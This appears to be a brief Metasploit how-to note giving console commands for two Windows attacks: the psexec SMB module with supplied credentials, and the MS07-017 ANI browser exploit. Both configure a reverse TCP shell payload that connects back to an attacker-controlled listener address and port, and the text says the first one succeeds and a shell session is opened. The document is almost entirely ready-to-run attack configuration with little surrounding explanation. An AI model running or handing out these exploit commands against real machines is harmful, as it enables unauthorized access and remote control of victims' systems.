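Active exploits
use exploit/windows/smb/psexec # this module is for connecting to a Windows shell
set RHOST 192.168.1.100 # target IP address
set PAYLOAD windows/shell/reverse_tcp # run a reverse shell on the target
set LHOST 192.168.1.1 # address the reverse shell connects back to
set LPORT 4444 # port for the reverse connection
set SMBUSER user1 # username
set SMBPASS pass1 # password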
exploit
Execution succeeds.
Then enter the session to connect to the shell.
Passive exploits
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize # load the module
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit
There is no system this ancient around anymore, so no demonstration.